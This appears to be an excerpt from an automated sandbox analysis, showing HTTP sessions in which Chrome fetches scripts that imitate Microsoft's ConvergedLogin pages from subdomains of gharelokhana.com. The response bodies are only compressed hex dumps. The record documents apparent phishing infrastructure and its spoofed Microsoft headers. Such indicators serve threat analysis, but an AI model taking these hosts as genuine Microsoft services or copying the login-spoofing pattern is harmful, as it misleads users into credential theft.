                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: 77 bb 1e 83 af 7c d8 ed c2 97 79 c7 5f 14 38 fb 40 dd c0 05 fe b3 b1 8e 23 2d ec 7b 79 ab a5 fa eb 95 1a 7f e2 19 ea 73 13 71 00 38 6d 57 77 5f cf e9 f1 81 5a 91 12 32 45 9a 49 16 b6 83 ed 46 40 ae ea 6f fa 4f d5 37 44 c4 76 50 d9 f4 16 0e e7 58 be e8 f3 5e 2c 35 18 15 4b d8 37 36 00 96 3b e0 4e 89 5c a6 1c cb 4b 63 b9 fb 8f 1b 97 bb a7 d7 bb f7 d4 0d a4 4b bd e2 ea 23 2e ef 57 56 bc 4f 2b de 35 57 bc 47 09 d5 96 a3 65 e1 48 49 94 78 e3 3e 74 dd 89 ec 44 ff b1 ea b1 d7 2f f5 f8 44 97 77 4a e5 4f 3d e5 73 57 1c b4 5d c5 79 d6 b7 63 e6 57 4f 65 51 d9 95 d9 ec 77 dd cb a6 63 78 53 3a 86 9b ce 5c 5c 3d 73 31 b7 1c 97 cf 1c 02 16 66 fb 14 4b e4 1e 85 1c 1f 75 c6 18 7f 04 23 87 4e eb 77 30 50 5f d2 56 cf 2d 11 ef 62 38 7d 1b cb 99 29 ef 31 5a 45 33 1f b4 86 54
                                                                                                                                                                                                Data Ascii: w|y_8@#-{ysq8mWw_Z2EIF@oO7DvPX^,5K76;N\KcK#.WVO+5WGeHIx>tD/DwJO=sW]ycWOeQwcxS:\\=s1fKu#Nw0P_V-b8})1ZE3T
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: 23 58 aa 5f 1d 1b ad c0 5b bf f2 2d cd e3 c3 dd dd 6b 26 2f df 3a 43 ec 0a 43 c9 c1 ff bc e6 9e 5d ee fd 6d ad 43 53 db b8 15 f3 ae 26 de 7b 1f 81 26 1e 5a 5f 5a de 97 d6 97 ee bd 2b f8 be 69 fd 5a dd 62 05 c5 e2 f6 97 2c 60 6d e2 c7 fe 5b 95 1d 88 52 88 da 6f fc e3 c2 17 e9 59 67 68 bf f4 ff de 7a e3 be 03 c0 3e 1e bd 19 2b 4c e0 61 39 94 7e eb b8 74 18 78 48 cd 5b f2 12 56 e8 dd 18 30 d9 3b 40 64 2f 71 a5 cc 85 fa e4 9d 16 a9 4c 71 a2 ee 29 6f c2 2b 07 d6 0a 51 ab f1 7e f8 4a 0f ce fc ac dd a3 51 28 25 f0 7d 90 61 76 1f 79 b8 8a b0 c2 ee 4f 28 4b 2a e3 88 96 5a 4a 42 21 50 e1 27 8a a0 e3 d7 6a b9 3f ed ec a4 1c 36 29 e5 43 94 f2 21 4a f9 10 e1 9f 39 ff 81 b3 64 53 73 27 32 4d 15 a8 10 30 92 c8 7b 07 b5 57 08 10 3c 8a c6 11 06 d2 a6 b3 c2 65 f8 9c 35 50
                                                                                                                                                                                                Data Ascii: #X_[-k&/:CC]mCS&{&Z_Z+iZb,`m[RoYghz>+La9~txH[V0;@d/qLq)o+Q~JQ(%}avyO(K*ZJB!P'j?6)C!J9dSs'2M0{W<e5P
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: 94 54 d1 54 b7 b0 7d 36 83 b3 d0 1c e9 65 63 81 2e d0 fa 9d c1 b5 b8 a8 60 b8 2b c9 bc af f3 79 2e d0 67 4a 98 78 e4 19 e9 4b 33 66 f3 37 c8 20 62 3e 77 71 8c 50 1d df 77 e3 f7 93 17 5d a1 5f f5 59 8f bf 8d d2 4b 72 20 96 f7 d0 17 8a b8 24 f3 08 ea 7d e8 08 34 6a 64 44 aa 80 06 3d a0 85 66 a8 ce 13 25 db a1 6d 81 14 1a 15 e9 ea d1 38 30 5a 41 ca 82 37 63 cb 06 8f 21 43 c4 54 5e 1c 56 5b a1 2d 02 7a f6 e3 b6 85 cc ed 7a 50 5b b2 48 83 de 89 0e 37 1f 90 3f 05 ac 5c 12 05 2c 19 ca f3 51 07 57 ad 65 e3 4f 4a b7 18 8a 06 c8 5d fe a4 5b 0c a6 36 ec 49 2e 86 84 52 3c e4 1f df 8b 65 be 17 6b f5 7d 61 60 86 d6 5d 64 60 b6 2f 42 05 d6 ea 07 dc c0 ac 51 2d 0b 03 33 14 5d 4c e4 2e bf a1 b7 84 81 19 9a 8b 95 6c 97 76 2e 19 99 91 9d da 15 55 a9 71 1b b3 3a 76 88 db 98
                                                                                                                                                                                                Data Ascii: TT}6ec.`+y.gJxK3f7 b>wqPw]_YKr $}4jdD=f%m80ZA7c!CT^V[-zzP[H7?\,QWeOJ][6I.R<ek}a`]d`/BQ-3]L.lv.Uq:v
                                                                                                                                                                                                2024-12-05 07:24:50 UTC8287INData Raw: 12 57 44 47 bb 25 80 8d a8 9b 8f 9a ac 9b df e8 13 4f 35 7f e0 ed 67 24 4b e5 a6 56 69 6f 72 17 60 db 88 e6 e1 c9 c6 53 f8 3e f7 5f 1a 4a 48 ee f7 d5 de 15 56 f8 d6 79 ae 1c 2d da c2 2d 3e 92 b7 cb be 29 64 be f0 98 d5 f0 ee 74 88 43 02 98 88 7c 36 be 07 f8 83 eb 68 41 bf 30 3a a2 58 4a 0b fd f1 10 2d c7 8e 1a 31 1b af 2c 67 54 8b ab 3f cb 15 56 19 0e 55 82 65 10 30 ba 80 5c 77 55 e0 bd 4a b0 0c 9a c4 68 41 ac bf 6e 41 25 58 06 f6 d7 05 88 09 93 99 7f a4 17 4b 20 ac 62 a6 42 37 7e 54 09 96 81 dd 8c 6e 50 04 36 d9 05 7a b1 04 26 32 fb ca fb c9 e8 ab 4c b0 0c 38 af 0b f0 e6 52 d9 8f c4 ab a5 60 71 39 2b ef ba 52 01 91 a8 07 07 bb 50 0f 8c 5e 2c 01 dd 2c f6 d9 87 b9 f2 e4 6f 47 6f 5e 57 c6 97 12 fb ca 3c e4 0b c7 bd 29 39 58 52 f5 dc 11 f9 eb 81 35 09 ef a8
                                                                                                                                                                                                Data Ascii: WDG%O5g$KVior`S>_JHVy-->)dtC|6hA0:XJ-1,gT?VUe0\wUJhAnA%XK bB7~TnP6z&2L8R`q9+RP^,,oGo^W<)9XR5


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                23192.168.2.849775164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:48 UTC546OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:50 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:49 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 122350
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 23 Oct 2024 19:33:27 GMT
                                                                                                                                                                                                etag: 0x8DCF399919435D9
                                                                                                                                                                                                x-ms-request-id: 46e4175b-801e-0020-5a8c-46cf4e000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072449Z-15d6f6465c8r48kshC1DUStyaw00000001bg00000000dcuv
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:50 UTC15577INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 7b 57 e3 b8 b2 38 fa ff fd 14 c1 7b 5f 26 19 4c 3a ce 8b c4 b4 87 13 02 74 b3 07 08 43 a0 67 f6 a1 d9 2c c7 56 82 07 c7 ce b1 1d 1e 3b e4 7c f6 5f 55 49 b2 e5 c4 a1 bb e7 9c 75 ef ba eb ee 47 13 4b a5 57 a9 54 aa 2a 95 4a 1f 7e de fa bf 4a 3f 97 76 bf ff 3f a5 e1 75 ef ea ba 34 38 29 5d 7f 3e bd 3a 2a 5d c2 d7 3f 4b 17 83 eb d3 fe f1 f7 d7 83 8d e2 ff af 1f bc b8 34 f6 7c 56 82 bf 23 3b 66 6e 29 0c 4a 61 54 f2 02 27 8c 66 61 64 27 2c 2e 4d e1 df c8 b3 fd d2 38 0a a7 a5 e4 81 95 66 51 f8 27 73 92 b8 e4 7b 71 02 85 46 cc 0f 9f 4b 65 a8 2e 72 4b 97 76 94 bc 96 4e 2f 2b 55 a8 9f 41 6d de c4 0b a0 b4 13 ce 5e e1 f7 43 52 0a c2 c4 73 58 c9 0e 5c aa cd 87 8f 20 66 a5 79 e0 b2 a8 f4 fc e0 39 0f a5 73 cf 89 c2 38 1c 27 a5 88 39
                                                                                                                                                                                                Data Ascii: {W8{_&L:tCg,V;|_UIuGKWT*J~J?v?u48)]>:*]?K4|V#;fn)JaT'fad',.M8fQ's{qFKe.rKvN/+UAm^CRsX\ fy9s8'9
                                                                                                                                                                                                2024-12-05 07:24:50 UTC14460INData Raw: ac 14 df 6c ed 40 25 12 b0 c7 b7 08 6b 4d 3c 80 35 07 c2 4a aa 54 db 4a ed d6 56 4d b7 ab 0c 7d 21 30 f6 cc 77 aa 82 a0 91 48 c1 3b 2b 6b 79 a0 25 00 07 7e c2 e3 85 72 45 48 dd e5 45 c0 2f fb 6b b6 ff 6c bf c6 da b2 02 0d e2 6e 00 e3 1d cc b0 43 31 e0 c5 26 2e e3 44 de 28 df 7f a5 fe 0c a2 9c 09 b4 80 02 90 7e ca fc 84 3a e1 4e 06 65 b5 d0 8c b1 c7 32 57 5e 71 c2 d0 42 36 9d e1 a5 19 ee 00 62 15 ed 39 c0 53 00 70 90 0d 86 65 15 56 be 61 72 da cf ec 1b 9e 74 90 7e 6f da 74 34 01 18 68 02 10 2a 3f 48 df e2 1e 76 36 63 f1 4a 39 d4 df d1 47 04 14 a6 23 3b 7a cc 22 26 ec 7b 2b 9e 6f 87 e8 8f 45 be 84 78 11 64 35 f7 77 f4 cb 52 72 d7 ea b3 6c 14 9b d0 d3 98 6e cf 5c e0 4d 73 d8 43 aa 2e 40 65 29 89 ae d0 2d ac f1 68 83 fb 1d b3 a2 6a 91 9b 23 9a 45 37 f7 5b f8
                                                                                                                                                                                                Data Ascii: l@%kM<5JTJVM}!0wH;+ky%~rEHE/klnC1&.D(~:Ne2W^qB6b9SpeVart~ot4h*?Hv6cJ9G#;z"&{+oExd5wRrln\MsC.@e)-hj#E7[
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: c3 34 73 86 c0 a7 21 c3 03 1c d2 0e 81 69 1e a8 e3 d4 ff 3d ea 3e 06 f2 a5 a7 65 74 61 44 3f 64 03 d2 85 ec 8c c7 48 19 dc 44 0f 90 03 55 2a 93 34 cb f8 84 d9 0b c6 b8 5e c4 eb 99 57 5f 18 5c c9 a4 ab 81 ff 4a 4d f9 dd 3c ca 7d ed 7b 2d ab b0 63 1b b1 1d db 8c 62 fc 41 c6 0f 51 1e a0 57 96 3f 45 bd e3 9e 96 d2 35 1f 3d d4 f1 92 5f 8d 79 f2 c2 71 5c 89 42 67 df b9 3d f7 0a 29 60 bc 8f 16 de 2e 2e be 83 39 b8 69 e2 88 ba 6f fc 82 d5 c0 35 7b e0 4f 9b 25 e2 97 18 19 fb 57 f7 13 14 81 14 1b c6 41 58 99 13 08 21 42 f8 8a d5 35 a7 b3 83 94 02 c7 d2 3e 49 4d 3c 61 5b 60 75 4c a2 0a 6d 54 20 c8 21 3d 18 11 39 48 26 7e 30 42 f3 72 09 aa 31 6a de c2 0e 08 86 84 44 f8 7c 88 04 77 57 f4 62 6d a5 da 8b dc 5e db 66 c0 a3 5d c6 02 db 03 6a 48 ca 08 ec e3 c8 7d 5b 6d b6
                                                                                                                                                                                                Data Ascii: 4s!i=>etaD?dHDU*4^W_\JM<}{-cbAQW?E5=_yq\Bg=)`..9io5{O%WAX!B5>IM<a[`uLmT !=9H&~0Br1jD|wWbm^f]jH}[m
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: cd 7a c0 aa 0b ce b0 53 7d ff 21 18 f3 bb 0f 35 f5 9c c0 01 b9 33 1a 71 86 a3 9a 0c 0c 42 83 de af 9c e7 c4 1c 0b 25 a9 14 0d dc 2b bd a6 d5 c0 77 d3 f1 84 85 41 62 c8 cc 8c 2c 93 e6 57 fc db 78 3d a0 9d 7e c0 db 3e fc 1c e7 d7 18 90 ec 24 95 43 fc b3 39 2e 70 2d c1 fc dc f2 f9 20 26 c1 cc c1 47 84 1a 9a 77 66 6b c6 51 74 73 ac 4c e0 39 4b cf 2c 00 f7 1a b6 81 5f 1e 9b cd a5 db a1 78 7b 64 be ad 33 02 e5 8c bb 46 3e 75 60 16 25 5d 9b 8d 98 90 51 04 cf 8b 59 47 9e 0e 87 a3 68 3f bd c5 b9 d9 cb b2 3d 24 82 39 e7 1b 73 96 0d e6 93 32 bc 35 33 4c 93 af 93 60 5c 1e 8e 41 cd 70 1a 7b e2 c4 5c 4b 21 d9 04 9a 6b e9 c8 1c 75 dc b0 30 f7 7b 6c 6b 2e 46 44 b5 85 5a a1 ea 96 57 ae a6 c2 43 9e 1d 48 f5 39 6f 6a 3c 82 09 b9 12 65 7f 18 42 4c 0a 93 4a d1 a2 ab 8e ea 89
                                                                                                                                                                                                Data Ascii: zS}!53qB%+wAb,Wx=~>$C9.p- &GwfkQtsL9K,_x{d3F>u`%]QYGh?=$9s253L`\Ap{\K!ku0{lk.FDZWCH9oj<eBLJ
                                                                                                                                                                                                2024-12-05 07:24:50 UTC2731INData Raw: de 33 e2 05 5b 30 1d 05 9a 67 8f b1 1e 4d bf 41 3f 66 3e d0 47 c1 96 8b a3 17 bc b1 fe 6e b5 4a 79 2d 20 eb 04 f4 37 c9 34 36 9e 34 b6 eb 6e a7 d7 44 2d d9 22 a7 6e 2a 07 26 b5 94 13 88 7c 3f f3 16 41 a3 a2 c8 16 4d b3 6a 21 28 fa 08 09 18 69 74 9a a4 70 4a 5d 09 f0 24 7b fa 34 53 04 54 8b 8b 10 0d 06 6e b6 54 b3 a8 d5 27 31 bb d0 fa d9 c3 43 c4 27 8e 7c 19 7a 06 69 2b cc 0a ba 20 ec b4 b5 fa bf 2c 3b c2 b7 a9 bb 01 8c 08 34 eb 14 2c 67 1e 7b c8 66 ee f4 cf 08 96 dd 15 75 54 a3 c0 db 19 0a e1 de f6 e8 81 27 e4 e3 e2 a9 4c a5 a6 53 09 82 d6 bf d6 73 c5 4f 42 22 a4 29 27 83 55 12 23 fc 93 a7 d1 1d d4 0f ab ec d2 67 df c5 82 81 2d 32 11 7d 4d fd 11 57 a4 25 97 cb 64 3c 8e d3 47 1c 58 54 43 ff 94 07 8b cd 16 75 db f6 2c 07 6c cb 42 cf 12 17 1b fa ad 54 d7 a9
                                                                                                                                                                                                Data Ascii: 3[0gMA?f>GnJy- 7464nD-"n*&|?AMj!(itpJ]${4STnT'1C'|zi+ ,;4,g{fuT'LSsOB")'U#g-2}MW%d<GXTCu,lBT
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: 4e 3f 06 23 fe 13 4c 5d fa 41 52 f5 d0 2f f8 06 fd f2 d6 36 82 9c fe cb 54 1b a6 68 f3 1c ff 5c e3 9f 2c 9c d0 97 2e fa d9 c3 43 de f7 2e c2 19 0d 3f 55 f1 7c c3 27 f6 e9 82 3e 20 37 f0 8d b9 34 74 7a 3a 55 9d 3c 0b ef 89 df 2d e7 45 50 fa 82 4f 92 9e 3e 7f 9e 03 2e 86 a6 02 f9 bf 90 32 49 55 42 35 50 bd 83 eb e5 95 24 aa 92 98 2a c9 74 25 19 8c fb 54 a9 4f f7 fc 88 26 17 ce aa 0f 0f 53 95 6c 4c bd 4a 6b b6 8c 98 dd 30 0d c9 cf 16 36 48 17 16 af 7b 4d 0c 25 6d ef 31 d1 9a bd e4 3a 29 11 fd 5e c0 09 f4 9b 89 e7 4f 7b 70 19 ce d9 fd ba 85 a9 56 b3 36 26 a1 33 cc b2 69 1c d9 69 af 06 f7 f5 6a 83 64 01 50 99 fb 85 5f c2 31 84 86 5a cc b3 48 1d a3 22 4c 0c bc 00 8b 61 c4 78 8c 71 22 11 59 65 60 d6 31 bc ec 19 47 2e b5 6e e9 42 89 57 69 d8 e7 65 32 2d 18 9d 89
                                                                                                                                                                                                Data Ascii: N?#L]AR/6Th\,.C.?U|'> 74tz:U<-EPO>.2IUB5P$*t%TO&SlLJk06H{M%m1:)^O{pV6&3iijdP_1ZH"Laxq"Ye`1G.nBWie2-
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: ec a6 b3 d4 81 58 f0 32 a8 12 11 17 e0 e0 b6 60 0c 96 40 10 92 ca 02 3d f9 76 5b 31 ab dd 18 cd 28 49 60 b1 7a 30 61 62 e1 27 cc 73 05 4f 24 97 9e 9d 87 21 09 c9 dd d0 93 9f da a0 d1 98 65 79 80 35 b1 03 08 26 97 b3 c4 f7 49 7b 0e 21 d8 77 33 75 46 33 ca 02 90 4f 2e fd d8 06 1b f7 22 db f1 63 87 61 36 c1 62 85 6d bb 3b e1 e4 6e 90 ba ae 80 cc cb c9 2c 74 ec 04 92 dc 65 c2 f1 9d 18 f2 3d f6 a3 24 da 49 37 46 33 4a 44 10 c5 8e 1d 7a 6e ec db 36 0d cc ce ec 00 8a 0b 31 f5 f0 96 fb 73 6b 9d c1 22 74 98 1d c7 be 48 b8 0f fd 5c 82 f3 09 9e 65 0c f6 00 f3 b9 b8 dd de e9 6a 37 46 33 e2 32 90 99 cd a0 18 31 16 f9 1e 70 90 db 6e 02 55 22 72 33 11 27 3b d1 8c dc 28 f5 43 18 16 21 cb 13 11 03 c9 a5 10 4e 0c 9b 29 cc 30 91 3c c8 e2 dd 8c c9 68 46 22 0c dc 88 65 71 e0
                                                                                                                                                                                                Data Ascii: X2`@=v[1(I`z0ab'sO$!ey5&I{!w3uF3O."ca6bm;n,te=$I7F3JDzn61sk"tH\ej7F321pnU"r3';(C!N)0<hF"eq
                                                                                                                                                                                                2024-12-05 07:24:50 UTC16384INData Raw: b1 f9 fb 9f 75 3e 8d b6 3f f9 f3 72 fc 9a d7 73 0d c4 3e 57 50 ec bf 69 c0 f8 cc 12 80 b2 72 ac 8e fc 41 9d b1 a3 1d 77 b1 b1 d8 ef be fb f0 25 20 ce d3 53 ba f3 a9 a8 d8 59 56 9c 5c 74 d1 e5 fa b6 15 35 b2 2f 3a ad fc 87 ec 30 4c 4b be ae 8b 9b 97 1b 8d a5 df 29 ca fb bf 73 bf ec 87 b7 0c 8c 8e 2e 52 fc 8c 4e 82 e9 5b 46 9c 8c 7a f9 cc 98 fc 99 b4 ca cf 1a 56 b3 fb 45 05 39 6c cb 85 a0 e5 7c f9 3c 68 8b 80 71 66 da af ad 9c 76 a4 38 be 2d 27 f0 2a bb e7 36 fa e8 ee f8 d9 b5 75 d4 4f d7 7f aa 12 6d af 59 46 bd 25 3e fb ee 8d 90 d5 eb 45 79 7e 5c 95 8f df 49 7e b1 58 f1 0a ad 7f fe 74 3b 3a ff f6 a6 66 f4 d7 cf c4 ff 3f 0b 75 9b c6 6f 47 d7 06 ec cf 4d d1 5f 14 7e b6 cb d6 37 d8 6c 6c ab fe fe 67 c4 88 e3 73 29 45 76 71 76 be 73 71 de c1 9c ca 74 f3 05 ca
                                                                                                                                                                                                Data Ascii: u>?rs>WPirAw% SYV\t5/:0LK)s.RN[FzVE9l|<hqfv8-'*6uOmYF%>Ey~\I~Xt;:f?uoGM_~7llgs)Evqvsqt
                                                                                                                                                                                                2024-12-05 07:24:50 UTC7662INData Raw: 0f 43 0f 01 8d 06 1c 40 10 5c a1 cf da 2f a2 c3 5f 88 83 23 40 8a 64 db 1a 4c 35 8d dc 68 ae 7d 23 8d f5 f9 8b b3 13 10 b1 ae 62 c6 4d 7f 44 f0 fd ae fd 46 a6 5f ee b4 7f 70 5b dd ef 04 cf 94 7f e2 bf fe 4e df fd 93 fe fb 2f 32 0d 7a 51 06 56 4c 2f a5 fd bb f4 ec 55 b7 87 5e 3c a1 d7 f9 92 ed da ef 68 ce b2 fd f8 ae 9b 0b 0e 84 3b f1 b3 f3 d1 ce 8f e4 a9 6c e0 e4 a7 a6 21 f9 d4 f2 a4 b4 55 54 a4 b3 43 4c 5d 75 c0 24 bb 2f a7 20 1e 82 78 34 e7 ac 61 ff ef da 0b d1 ed fe bf f1 6a d7 01 79 f2 a4 13 f4 8e ae d1 12 35 9f 02 cf c4 56 fd ce 17 b7 c0 e6 f7 63 72 d7 ed fd 3d 81 5e be 00 46 ef ff ae d1 83 96 13 6f ff bc 77 cc be 25 28 64 cd 8a fb e3 9d 16 a0 a0 a9 d9 3d ee 21 c4 c7 c1 53 6e 75 f1 64 18 26 b4 7f bf c9 2d 96 31 9e a6 ef 13 cd 2f 4c 4a 5b 16 d8 a3 b7
                                                                                                                                                                                                Data Ascii: C@\/_#@dL5h}#bMDF_p[N/2zQVL/U^<h;l!UTCL]u$/ x4ajy5Vcr=^Fow%(d=!Snud&-1/LJ[


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                24192.168.2.849776164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:48 UTC853OUTGET /Prefetch/Prefetch.aspx HTTP/1.1
                                                                                                                                                                                                Host: 67f9d952-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:49 UTC489INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:49 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: no-store, no-cache
                                                                                                                                                                                                x-ms-correlation-id: d9dda0c3-f1df-40aa-9481-7bbba057574b
                                                                                                                                                                                                x-ua-compatible: IE=Edge
                                                                                                                                                                                                x-cache: CONFIG_NOCACHE
                                                                                                                                                                                                x-msedge-ref: Ref A: 2EBDA27659CF4F16BE1D4C5A5E4AD0D4 Ref B: AMS231032604035 Ref C: 2024-12-05T07:24:49Z
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:24:49 UTC1252INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                                                                                                                                                                Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                                                                                                                                                                2024-12-05 07:24:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                25192.168.2.849783164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:51 UTC762OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:52 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:52 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 5538
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                                                                                                etag: 0x8DCBD531731891C
                                                                                                                                                                                                x-ms-request-id: 2dfc057d-801e-0059-2f8c-467b78000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072452Z-15d6f6465c8qxjgbhC1DUSs9xw00000001m0000000004hyp
